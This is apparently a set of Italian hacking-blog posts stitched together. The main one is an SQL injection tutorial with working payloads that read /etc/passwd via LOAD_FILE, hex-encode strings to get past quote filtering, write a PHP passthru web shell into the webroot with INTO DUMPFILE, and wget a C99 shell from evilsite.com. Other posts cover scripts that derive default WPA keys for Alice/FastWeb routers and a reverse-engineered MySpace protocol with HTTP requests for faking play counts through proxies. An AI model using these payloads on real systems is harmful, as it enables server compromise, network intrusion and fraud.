Ebbene, è passato più di un anno, Google sicuramente avrà subito tantissimi cambiamenti sia a livello grafico che a livello di funzionalità, eppure questo problema non è ancora stato patchato.

Qui di seguito trovate il mio video, chiedo scusa per la bassa qualità ma quello originale è stato danneggiato tra un backup e l’altro, così il meglio che ho potuto fare è stato scaricarne la versione mp4 da youtube, dove un ragazzo che non conosco ha postato lo stesso video in bassa definizione.

Poi, qualche tempo fa, mi sono imbattuto in un altro video, postato su Vimeo da Emanuele Gentili, il quale mostra sostanzialmente la stessa vulnerabilità.

Il buon emgent, noto per la sua politica di responsible disclousure, ha immediatamente scritto al team tecnico di Google … e cosa gli hanno risposto ?

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?

Perfetto, non solo in più di un anno non è cambiato nulla, non solo questa vulnerabilità potrebbe essere sfruttata in scenari praticamente infiniti, ma lo staff di Google si permette anche di rispondere così!

Che dire … bah! -.-

Related posts:

1. Google Hacking
2. Google : 0, Io : 1
3. Hybris memory lookup, now Google powered!!!

Sabato scorso son passato all’hack meeting, invitato da un (nuovo) amico, e mi sono imbattuto in uno speech proprio su questa tecnica di intrusione (che devo dire è anche la mia preferita per quanto concerne il web hacking ) ed il ragazzo che lo stava tenendo ha detto alla fine la frase “con le sql injections si possono fare innumerevoli cose” che mi ha fatto venir voglia di scrivere questo articolo.

Ci sono alcuni aspetti delle SQL injections che in realtà non sono molto conosciuti, ma che aprono davvero un mondo e portano un ipotetico attaccante (o un informatico che deve porre rimedio a questa piaga) nella condizione di avere accessi con privilegi ben superiori a quelli che una “normale” iniezione darebbe.

Accesso in lettura al file system.

MySQL, così come tantissimi altri database, hanno delle funzioni integrate nel linguaggio stesso che offrono funzionalità avanzate all’interno delle query, basti pensare alle funzioni CONCAT() o MID() per operare sulle stringhe.

Una funzione non molto conosciuta, principalmente perchè son pochi gli scenari nella quale convenga usarla, è la funzione LOAD_FILE() che, come suggerisce il nome stesso, serve per caricare il contenuto di un file all’interno di un buffer di MySQL.

Ad esempio, eseguendo la query :

SELECT LOAD_FILE(‘/etc/passwd’)

Riceveremo come risultato il contenuto del rinomato file … beh, perchè non utilizzare tale funzione anche all’interno di un injection ?

Invece di un ipotetico :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,username,password FROM users/**

Potremmo fregarcene della tabella utenti ed andarci direttamente a spulciare il filesystem :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,LOAD_FILE(‘/etc/passwd’),NULL/**

Come aggirare la rogna degli apici.

Seguendo l’esempio qui sopra riportato, vorrei parlare di un altro “trick” di MySQL non motlo conosciuto … spesso durante il testing di una sql injection, ci rendiamo conto che utilizzare degli apici all’interno del codice da noi iniettato diventa una vera rogna, questo specialmente quando la query che esegue la pagina web (e che noi non conosciamo del tutto) è molto complessa, con diverse JOIN ecc, risultando di volta in volta in un errore di sintassi perchè abbiamo messo un apice di troppo (che magari ci è stato segato dalle magic quotes, le puttane!!!).

Questo potrebbe accadere ad esempio, con gli apici utilizzati per passare l’argomento alla funzione LOAD_FILE … ma in realtà, aggirare questo problema (e metterlo nel cxxo alle gpc!) è abbastanza semplice se si conosce il modo … basta codificare in esadecimale!

Ovvero, invece di utilizzare la dicitura

SELECT LOAD_FILE(‘/etc/passwd’)

Utilizzeremo

SELECT LOAD_FILE( 0x2f6574632f706173737764 )

Dove 0x2f6574632f706173737764 corrisponde alla stringa /etc/passwd codificata in esadecimale … e così, via gli apici!

Questo si può utilizzare anche nei confronti (0x61646d696e = admin) :

SELECT NULL,NULL,username,password WHERE username=0x61646d696e

E così via, generalmente ogni qual volta bisognerebbe utilizzare una stringa ma per un motivo o per un altro non possiamo (o vogliamo perchè siam pigri) farlo.

Accesso in scrittura al file system.

Mi son tenuto questa chicca per ultima perchè è la più sfiziosa

Non sarebbe bello poter arrivare, partendo da una semplice sql injection, ad una shell php (o di qual si voglia linguaggio) pronta a runnare sul server in questione, così da poterci spulciare tutto il file system in pace ed eseguire comandi da remoto?

Beh, è fattibilissimo!

Analogamenente alla funzione LOAD_FILE precedentemente vista, esiste anche una coppia di keywords MySQL che invece ci permette di inserire del contenuto arbitrario all’interno del file che vogliamo, tale magica accoppiata è INTO DUMPFILE .

C’è da specificare una cosa che, anche essendo ovvia, non è così banale … dovendo specificare come argomento il path completo del file che vogliamo creare (o sovrascrivere!!), è sottointeso che tale cartella debba essere scrivibile dall’utente con i quali privilegi è in esecuzione il demone MySQL.

Se ci interessasse solamente creare un file non necessariamente raggiungibile via web (quindi non nella cartella nella quale apache si aspetta i file html e php), potremmo benissimo scrivere nella /tmp/ che generalmente è accessibile da tutti, utilizzando la query :

SELECT ‘contenuto’ INTO DUMPFILE ‘/tmp/blablabla’

O meglio ancora, codificato in esadecimale come abbiamo visto prima :

SELECT 0x636f6e74656e75746f INTO DUMPFILE 0x2f746d702f626c61626c61626c61

Dove “contenuto” ovviamente è quello che vogliamo mettere dentro il file …

Scrivere nella /tmp non è molto utile, a meno che il sito sia affetto anche da una LFI (local file inclusion = inclusione di file locali) e quindi potremmo prima creare il file e successivamente forzare una pagina ad includerlo per eseguirlo.

Quello che ci interessa veramente però (almeno quello che solitamente interessa a me ) è scrivere nella stessa cartella che contiene il sito, così da poterci mettere una shell ed utilizzarla in tutta comodità.

Non esiste (o almeno io non l’ho trovato) il modo, tramite una query SQL, di trovare il full path della htdocs, però ci sono un paio di metodi che, con un po di intuito e fortuna funzionano il 99% delle volte.

Il primo, tramite il metodo sopra indicato di lettura del file system,  consiste nel leggere il file di configurazione di apache (httpd.conf) che solitamente è contenuto in /etc/[qualcosa] (dove [qualcosa] è cmq un valore che varia di poco da server a server ed è di conseguenza facilmente ‘guessabile’) e vedere i path dei vari virtual hosts .

Questo metodo però, necessita che l’utente con il quale runna MySQL possa leggere quel file e non sempre questo è possibile anzi, se chi ha configurato il server è bravo, non è quasi mai possibile.

Il secondo metodo invece, funziona praticamente sempre

Ormai, la stragrande maggioranza dei siti utilizza applicazioni web cms quali WordPress, PHPNuke (OMFG c’è ancora chi lo usa!!!), PHPFusion, Joomla e così via.

Tali sistemi, al momento dell’installazione, inseriscono in una tabella (che varia da sistema a sistema, ma essendo questi sistemi opensource cmq le tabelle sono note) il full path nel quale sono stati installati, il più delle volte per poter includere correttamente i vari file php che gli servono, altre volte (specialmente nel caso dei forum) per sapere in quale cartella, ad esempio, possono spostare gli allegati uploadati in un post.

Ebbene … è proprio quello che ci serve!

Abbiamo una sql injection, sappiamo quale sistema PHP gira nel sito, sappiamo quale colonna di quale tabella ci interessa … ci basterà utilizzare una sql injection che selezioni quella variabile dal database e eccoci qui, abbiamo il full path di installazione del sito che stiamo attaccando!

A questo punto, ipotizzando che il path sia “/var/www/htdocs/sito.com/” (ipotesi tra l’altro non molto distante dalle casistiche reali), potremmo utilizzare una sql injection del tipo :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,’<?php passthru($_GET["cmd"]); ?>‘,NULL INTO DUMPFILE ‘/var/www/htdocs/sito.com/lulz.php’/**

(Magari il tutto opportunamente codificato in hex come visto prima, fate vobis che a me non va XD)

Dalla query risulta evidente come abbiamo scritto un piccolo codice php all’interno della pagina lulz.php, codice che eseguirà qualsiasi comando gli venga passato tramite la variabile “cmd”, mostrandone il contenuto … a questo punto, o utiliziamo lo script direttamente, del tipo :

http://www.site.com/lulz.php?cmd=ls

Oppure, cosa ancor più comoda, potremmo utilizzarlo per scaricare, tramite wget, una shell un attimino più decente (magari una C99) :

http://www.site.com/lulz.php?cmd=wget%20http://www.evilsite.com/c99.txt

http://www.site.com/lulz.php?cmd=mv%20c99.txt%20c99.php

Ed eccoci qua, da una semplice e comune SQL injection, siamo passati ad avere una shell sul server! Non male vero? Soprattutto se pensate che tramite queste funzioni è possibile accedere, tramite i privilegi del demone MySQL, anche ad eventuali risorse di rete … a voi la ricerca!

Ci tengo a precisare che non sto scrivendo un articolo di questo genere, dopo tanto tempo che non ne scrivevo, per incitare le persone a lamerare, ma solo per sensibilizzare quei programmatori che troppo spesso, soprattutto in ambito professionale, sottovalutano dei bug apparentemente piccoli ma che, come mostrato, possono portare a conseguenze veramente disastrose.

Cya the next time!

Related posts:

1. Introduction to SQL Injections
2. iScan
3. Usare la serializzazione in PHP per il caching delle query SQL

A differenza del caso FastWeb, il quale per il calcolo si basava solo sull SSID della rete, in questo caso ci serve anche il seriale del router che, come dimostrato dalla ricerca precedentemente linkata, è ricavabile tramite un sistema a due incognite dal quale, la WHC, ha tirato fuori una tabella di valori noti, tabella che ho inserito nel mio script.

Di conseguenza, a meno che il lettore non ampli la propria tabella a mano, seguendo le indicazioni della WHC, lo script funzionerà solo con SSID del tipo :

• Alice-96xxxxxx
• Alice-93xxxxxx
• Alice-56xxxxxx
• Alice-55xxxxxx
• Alice-54xxxxxx
• Alice-48xxxxxx
• Alice-46xxxxxx

Sono sicuro cmq che cercando nella rete delle tabelle un po più estese si trovano

Lo script è commentato (come il precedente), in modo tale il lettore avrà la possibilità non solo di utilizzarlo, ma anche di capirlo, che è la cosa che più mi preme al fine di una condivisione libera dell’informazione e della cultura informatica in generale.

Enjoy.

Related posts:

1. Script per il calcolo della chiave WPA dei router FastWeb Pirelli.
2. Alice Router Unlocker
3. Informazione di Servizio, Chiave Pubblica

“Bene” mi sono detto, “Se hanno questo servizio, avranno anche una pagina dove spiegano l’algoritmo e pubblicano il codice” .

Beh, la pagina c’era, e non era nemmeno un loro lavoro bensì quello di un altro gruppo (vedere il link “fonte” alla fine di quell’articolo), ma non c’era il sorgente!

In pratica, queste persone, hanno preso il lavoro che altri hanno pubblicato liberamente e per tutti, lo hanno ri-pubblicato (citando la fonte eh, per carità), ne hanno ricavato un servizio (guarda caso un servizio che fa gola a molti su un sito con degli ads pubblicitari) ma non hanno condiviso a loro volta le conoscenze distribuendo il codice del servizio … un po disonesto non vi pare?

Cioè, se io prendo un informazione libera, sono moralmente tenuto a rendere altrettanto libera qualsiasi opera io ne possa ricavare … non legalmente, ma moralmente.

Ebbene, ci penso io con un mio script fresco fresco

Vi posto qui di seguito il codice di uno script PHP che, seguendo quell’algoritmo, parte dal SSID di un router e stampa la chiave WPA di default.

Ribadisco, come loro, che :

Attualmente è possibile recuperare la chiave Wireless degli Access Point FastWeb Pirelli, nello specifico con i seguenti Mac Address:

00:08:27 Pirelli Broadband Solutions
00:13:C8 Pirelli Broadband Solutions
00:17:C2 Pirelli Broadband Solutions
00:19:3E Pirelli Broadband Solutions
00:1C:A2 Pirelli Broadband Solutions
00:1D:8B Pirelli Broadband Solutions
00:22:33 Pirelli Broadband Solutions
00:23:8E Pirelli Broadband Solutions
00:25:53 Pirelli Broadband Solutions
00:03:6F Telsey S.p.A. (in fase di Test)
00:21:96 Telsey S.p.A. (in fase di Test)

Detto questo, a breve pubblicherò uno script analogo ma per i router Alice, dato che stanno uscendo lavori anche in questo senso

Related posts:

1. Script per il calcolo della chiave WPA dei router Alice Gate VoIP 2 Plus Wi-Fi
2. Alice Router Unlocker
3. Informazione di Servizio, Chiave Pubblica

Dopo l’accaduto, subito nella rete si sono sparsi svariati rumors, la maggior parte dei quali si può riassumere in :

Non eseguite il jailbreak dell’iPhone se non volete essere infettati!

Dato che sta frase è evidentemente stupida e, in alcuni casi, aimè è stata pronunciata con secondi fini (della serie “ecco una scusa x far credere a tutti che jailbreakare non va bene”), tanto xkè non c’ho niente da fare scrivo un po nel dettaglio cosa faceva sto worm, come funzionava ma soprattutto PERCHE’ funzionava.

Innanzitutto, c’è da fare un preambolo.

Nel momento in cui si jailbreaka il proprio iPhone, viene installato il demone ssh configurato con la password di root di default “alpine” (e qui i più svegli hanno già capito l’inghippo).

Naturalmente è scontato che tale password va contestualmente cambiata con una più sicura e meno conosciuta, ma a quanto pare tanto scontato non è dato che gli iPhone ownati erano proprio di persone che non hanno eseguito questo procedimento.

In pratica, il worm in questione, eseguiva una scansione sui seguenti indirizzi:

(tabella prelevata da questo sito)

Come è facile intuire, sono gli intervalli di indirizzi ip che identificano i maggiori provider di connettività mobile.

Una volta identificato un host attivo tra quelli nell’intervallo, il worm sostanzialmente verificava se la porta 22 era aperta (quella del demone ssh) e provava a loggarsi con la password di default alpine.

Una volta dentro, copiava se stesso sul dispositivo e continuava la scansione sulla subnet locale del telefono infettato, e così via, ripdoducendosi esponenzialmente.

That’s fucking all!

Non è stata colpa del jailbreak, non è stata colpa di un mistico exploit 0day che sfruttava qualche strana falla nel sistema … è stata colpa solo ed esclusivamente, come nel 99% dei casi, della stupidità umana.

Cazzo ma non ti viene in mente di cambiarla la password ssh quando lo installi ?!?!? Bah -.-

Related posts:

1. Resettare le password ed i privilegi di MySQL

Con il tempo ero giunto alla conclusione che la mia visione di questo mondo (non necessariamente “corretta”, ma è pur sempre mia) non fosse destinata ad esser condivisa con nessuno, vuoi per differenze caratteriali, vuoi per differenze in quanto agli scopi … e così decisi di chiudere il mio vecchio forum e lasciare questo blog tramite il quale condividere “tra me e me” le mie idee.

Il tempo è passato, molti siti ho continuato a controllarli di tanto in tanto senza intervenire attivamente e le mie conclusioni hanno quasi sempre trovato un ulteriore conferma … quasi … poichè un sito, una comunity, mi è sempre sembrata diversa.

Questo gruppo di ragazzi ha iniziato da 0 e con il tempo ha continuato ad ampliare le proprie conoscenze, a pubblicare materiale interessantissimo, senza mai sfociare nel lamering e senza pretendere di essere “il miglior gruppo di hacking” sulla scena … anzi, da quel che mi risulta non si sono mai riferiti a loro stessi con queste parole, hanno lasciato parlare i loro lavori per loro.

Sto parlando dell’ Inclusion Hunter Team … con Marco (white_sheep) ci siamo conosciuti in facoltà (ebbene si, me lo ritrovo pure all’università sto rompipalle! XD) e abbiam passato intere lezioni di analisi (l’unica altra opzione era addormentarsi) a chiacchierare di server, reti neurali e amenità di questo tipo.

Con Simone (r00t.ati), il quale ha iniziato la stessa facoltà quest’anno, ci sarà sicuramente modo di conoscersi presto per quanto lo conoscevo già da tanto, fin dai tempi del “fu” Notsec Group (bei tempi, se non fosse stato per un frocio maledetto sarebbe stato uno dei gruppi + tecnicamente avanzati della scena) .

Mentre con Francesco (merlok) sta nascendo da qualche settimana un amicizia ed un intesa sempre più consolidate, poichè oltre a me è l’unico pazzo che sta mettendo mano al codice di Hybris collaborando attivamente

Insomma per farla breve, sono entrato a far parte ufficialmente del loro gruppo, ne sono profondamente onorato e spero di poter dare il mio cotributo al massimo delle mie possibilità e dei miei skills, magari (magari!) imparando da loro tutte quelle cose che ancora non so (e sono tantissime :S).

Che altro dire … spacchiami il culetto ai passeri!

No related posts.

Inutile dire l’enorme sforzo che tutti abbiamo fatto (+ che altro loro, io sono arrivato a lavori avanzati ed ho dovuto correggere solo alcune cosette, che tutta via stavano bloccando tutto ) e onestamente nemmeno mi sento di scrivere “finalmente ecco il porting di Ettercap per iPhone” poichè allo stato dell’arte c’è solo una versione super-sperimentale-ultra-patchata-a-mano-pork-around, che tutta via, escluse alcune piccole anomalie qua e la, sembra funzionare egregiamente.

Durante l’ultima sessione con i ragazzi, ho fatto uno shot del mio schermo mentre ero in ssh sul mio iPhone e stavo usando Ettercap con la funzionalità ncurses (ovviamente scordatevi della gui Gtk) :

Se vi interessa installare e provare questa versione, inutile dire che avrete bisogno di un iPhone jailbreakato, dovrete aggiungere su Cydia il repository

http://theworm.altervista.org/cydia/

Che è di uno dei ragazzi con i quali sto collaborando, ed installare da questo repo libnet e ettercap …. buon poisoning!

PS: Nel repo di TheWorm trovate anche il toolchain per firmware 3.0 già compilato e pacchettizzato

No related posts.

Innanzitutto procediamo con il primo passo, cioè l’installazione dei due sw

sudo apt-get install mutt ssmtp

Una volta finito il processo di installazione, andiamo ad editare il file /etc/ssmtp/ssmtp.conf per configurare l’INVIO delle email, copiandoci dentro questo contenuto :

root=vostra_email@gmail.com
mailhub=smtp.gmail.com:465
UseTLS=YES
hostname=hostname_del_pc
FromLineOverride=YES

Ora dobbiamo creare il file ~/.muttrc nel quale inseriremo i parametri relativi alla connessione IMAP per la ricezione delle email ed il comando ssmtp per l’invio :

set imap_user = "vostra_email@gmail.com"
set imap_pass = "vostra_password"
set from = "vostra_email@gmail.com"
set realname = "vostro_nome"

set sendmail = "/usr/sbin/ssmtp -fvostro_nome -au vostra_email@gmail.com -ap vostra_password"
set folder = "imaps://imap.gmail.com:993"
set spoolfile = "+INBOX"
set postponed="+[Gmail]/Drafts"
set header_cache=~/.mutt/cache/headers
set message_cachedir=~/.mutt/cache/bodies
set certificate_file=~/.mutt/certificates
set sort = 'threads'
set sort_aux = 'last-date-received'
set imap_check_subscribed
set move = no

ignore "Authentication-Results:"
ignore "DomainKey-Signature:"
ignore "DKIM-Signature:"
hdr_order Date From To Cc

Fatto questo, tutto è pronto, avviate mutt (al primo avvio dovrete premere ‘a‘ per accettare in modo permanente il certificato del server IMAP) e godetevi la vostra posta elettronica in console

No related posts.

Potete trovare il codice e le istruzioni per l’installazione la configurazione a questa pagina … proprio perchè mi sono sbattuto per scrivere il file README, NON risponderò ad alcuna domanda riguardante installazione e configurazione ma solo ad eventuali domande tecniche o che comunque reputerò intelliggenti .

Riporto brevemente la versione italiana del readme :

WP-Sentinel, erede in parte del progetto evilsentinel (R.I.P.), è un plugin per la piattaforma WordPress che aumenterà la sicurezza del vostro
blog da eventuali attacchi di cracker, lamer, black hats, h4x0r, ecc .
Il sistema verrà caricato prima degli altri plugins ed eseguirà una serie di controlli sulle richieste http in arrivo ed, in caso una o più richieste
facciano scattare un *allarme*, la bloccherà mostrando un avviso all’utente e notificherà per email l’accaduto all’amministratore del sito in questione,
con tutti i dettagli del potenziale attacco .

Questo plugin è in grado di bloccare i seguenti tipi di attacchi :

- Cross Site Scriptings <http://it.wikipedia.org/wiki/Cross-site_scripting>
- Remote File Inclusions <http://it.wikipedia.org/wiki/Remote_File_Inclusion>
- Local File Inclusions <https://www.ihteam.net/blog/hacking-tutorial/local-file-inclusion-tutorial/>
- SQL Injections <http://it.wikipedia.org/wiki/SQL_injection>
- Cross Site Request Forgery <http://it.wikipedia.org/wiki/Cross-site_request_forgery>
Il plugin *NON* effettua controlli nel caso in cui l’utente che effettua la richiesta è un amministratore del blog, quindi per testare il sistema dovrete

effettuare il logout .
Per INSTALLARE wp-sentinel, uploadate tutta la cartella ‘wp-sentinel‘ all’interno della cartella dei plugins ‘/wp-content/plugins/‘ del vostro blog e accertatevi
che la cartella ‘/wp-content/plugins/wp-sentinel/log’ sia scrivibile .
Successivamente il sistema potrà essere abilitato come ogni altro plugin ed entrerà immediatamente in funzione .

WP-Sentinel non ha molte configurazioni disponibili al momento, ma quelle poche che ci sono possono essere modificate tramite il file ‘/wp-content/plugins/wp-sentinel/php/config.php‘ .
I tre valori di configurazione sono :

- enabled : Impostato ad 1 abilita wp-sentinel, a 0 lo disabilita .
- notification : Abilita o meno le notifiche via email all’admin del blog .
- logging : Abilita o meno il logging degli allarmi dentro la cartella ‘wp-sentinel/log’ .

Enjoy

Related posts:

1. WP-Sentinel
2. Nuova funzione load, come realizzare in poche righe un sistema di plugin
3. Informazione di Servizio, now PDF powered :)

Come alcuni di voi sapranno, su questo social network è possibile creare un profilo per la propria band, nel quale poter uploadare i propri brani (o alcuni di essi) in formato mp3 che verranno poi eseguiti nel profilo stesso dall’apposito player in flash .

Ciò che non tutti sanno, o perlomeno che non tutti hanno notato, è che questo player tiene traccia delle statistiche di ogni brano, principalmente quanta gente lo ha ascoltato complessivamente, giornalmente, ecc ecc. Tali statistiche vengono poi utilizzate per scegliere le band da promuovere nella sezione musicale di myspace, in parole povere, le band più ascoltate usufruiranno di una pubblicizzazione gratuita (e decisamente remunerativa) nella sezione di MySpace .

Il mio compito era di reversare il protocollo di comunicazione di MySpace tra i vari server e sfruttare tali informazioni per scrivere un programma che incrementi arbitrariamente le statistiche di un brano o di tutta la playlist .

Per un motivo o per un altro il mio rapporto professionale con questa persona è andato a farsi benedire e mi son trovato in mano una settimana di ricerche e coding, che a questo punto decido di condividere con chiunque sia interessato, soprattutto perchè software analoghi sono sempre proprietari e a pagamento .

Come è facile immaginare, tutto ha inizio con una richiesta http al profilo dell’artista, nella forma :

http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={ID DEL PROFILO}

Dove ovviamente l’ultimo parametro è un id numerico che identifica il profilo, ad esempio, un profilo che avevo creato per i test :

http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=454317278

Richiedendo ai server myspace questa pagina, ovviamente verrà scaricato l’html e il blocco del player flash, con dei parametri (le flashvars) molto importanti che ci serviranno in seguito, questi parametri si presentano nella forma :

...
plid=92912 <--- id della playlist
profid=454317278 <--- id del profilo
...
artid=19268119 <--- id dell'artista 
...

Tramite questi parametri, iniziamo ad addentrarci nel protocollo vero e proprio che sfrutta il player di myspace per ottenere le informazioni rigurdanti la playlist … reversando tale sfw, ho verificato che le informazioni sulla playlist vengono richieste in formato xml e possono essere ottenute tramite la seguente richiesta :

http://musicservices.myspace.com/Modules/MusicServices/Services/MusicPlayerService.ashx?artistUserId={ID PROFILO}&playlistId={ID PLAYLIST}&action=getArtistPlaylist&artistId={ID ARTISTA}

Quindi nel nostro profilo di esempio, l’url risulterà essere :

http://musicservices.myspace.com/Modules/MusicServices/Services/MusicPlayerService.ashx?artistUserId=454317278&playlistId=92912&action=getArtistPlaylist&artistId=19268119

E con questo otteniamo un xml con le informazioni della playlist, traccia per traccia, compresi gli id di ogni canzone, le statistiche, eventuali immagini cover, etc etc etc … in particolare ci interessa l’attributo songId del nodo xml song della canzone che ci interessa, nel caso del mio profilo di esempio, l’xml relativo all’unica canzone che ho caricato risulta essere :

...
<song songId="40916167" ...
...

A questo punto, dobbiamo iniziare la procedura http che genererebbe un normale utente aprendo il profilo, caricando il player flash, richiedendo l’ascolto di una traccia e di conseguenza incrementando il valore di ascolto della stessa .

La gestione del tutto è delegata al player swf e una volta reversato ho notato che la logica di ogni richiesta effettuata dal player stesso è la seguente :

• Richiedo un nuovo “token” (un id alfanumerico che identifica ogni richiesta) di autorizzazione al server musicservices.myspace.com .
• Richiedo al server profile.myspace.com di iniziare lo stream della traccia e successivamente di incrementarne le statistiche .

Ovviamente le due richieste vengono eseguite in http tramite una serie di campi nell’header specifici, impostati dal player, che identificano in modo univoco il player rendendo “sicura” e “non riproducibile” (almeno secondo loro XD) tutta la transazione .

Analiziamo ora la prima richiesta, ovvero l’impostazione del nuovo token di autorizzazione verso l’host musicservices.myspace.com :

POST /Modules/MusicServices/Services/MusicPlayerService.ashx?action=getToken HTTP/1.0
Host: musicservices.myspace.com
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: {USER AGENT DELL'UTENTE CHE VISITA IL PROFILO}
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Content-type: application/x-www-form-urlencoded
x-myspace-id: ownerId={ID PROFILO};contentId={ID TRACCIA}
x-myspace-type: Music
x-myspace-action: Stream
Content-length: 16
service=tokennew

Quindi, una richiesta di esempio con Firefox e alla traccia del profilo che ho appositamente creato, risulterebbe :

POST /Modules/MusicServices/Services/MusicPlayerService.ashx?action=getToken HTTP/1.0
Host: musicservices.myspace.com
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Content-type: application/x-www-form-urlencoded
x-myspace-id: ownerId=454317278;contentId=40916167
x-myspace-type: Music
x-myspace-action: Stream
Content-length: 16
service=tokennew

Il server a questo punto ci risponde con un xml del tipo :

<?xml version="1.0" encoding="utf-8"?><token>N1jfEyw1SLA2E2s6qcFAxaqIdbqU5dC/47iDlNUVpPoZXXzWqgzrX8bxMZAS2Np/UGKFeb+bO8EEANKT6fSIatp9ueAK9oKrDpP90lCHlAI=</token>

Dove la parte in grassetto identifica il famoso token .

Una piccola nota: Ai fini del nostro obiettivo, cioè incrementare le statistiche di una canzone, NON è importante ritrasmettere questo token nella richiesta successiva, ma è OBBLIGATORIO richiederlo per ogni streaming simulato, poichè da quel punto in poi il server contrassegnerà il nostro indirizzo ip come “autorizzato” ad ascoltare la canzone, per poi cancellare tale autorizzazione alla richiesta successiva .

Detto questo, possiamo procedere con la seconda richiesta, ovvero l’inizializzazione dello streaming vero e proprio, che aumenterà le statistiche della canzone richiesta :

GET /index.cfm?fuseaction=user.viewprofile&friendID={ID PROFILO} HTTP/1.0
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: {USER AGENT DELL'UTENTE CHE VISITA IL PROFILO}
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Host: profile.myspace.com
x-myspace-id: ownerId={ID ARTISTA};contentId={ID TRACCIA}
x-myspace-type: Music
x-myspace-action: Stream

Quindi nel nostro caso la richiesta appare come :

GET /index.cfm?fuseaction=user.viewprofile&friendID=454317278 HTTP/1.0
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Host: profile.myspace.com
x-myspace-id: ownerId=19268119;contentId=40916167
x-myspace-type: Music
x-myspace-action: Stream

Ed in seguito a questa richiesta il server incrementerà le statistiche della canzone ^^ .

Ovviamente, per chi volesse realizzare un applicazione che incrementasse le stats in modo consistente, dovrebbe instaurare parecchie richieste in parallelo (threads rule ), possibilmente utilizzando una lista di proxy http abbastanza corposa da utilizzare singolarmente per ogni richiesta http .

Related posts:

1. Google Hacking
2. Realtime Source Auditing
3. Syn Scanning